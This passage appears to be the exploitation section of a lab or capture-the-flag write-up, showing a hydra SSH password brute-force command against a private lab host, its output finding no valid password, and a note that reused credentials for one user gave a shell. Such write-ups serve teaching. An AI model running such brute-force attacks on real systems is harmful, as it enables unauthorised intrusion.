Exploitation

I tried bruteforcing but for some reason I was unable to get a valid response.

hydra -L /home/kali/Hunnit/results/users.txt -P /home/kali/Hunnit/results/passwords.txt -s 43022 -t 4 192.168.100.125 ssh -vv 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-30 15:00:51
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.100.125:43022/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://rjackson@192.168.100.125:43022
[INFO] Successful, password authentication is supported by ssh://192.168.100.125:43022
[STATUS] attack finished for 192.168.100.125 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-30 15:01:11

However when I tried the credentials for the user dademola with his corresponding password from earlier I managed to get a shell.

Last updated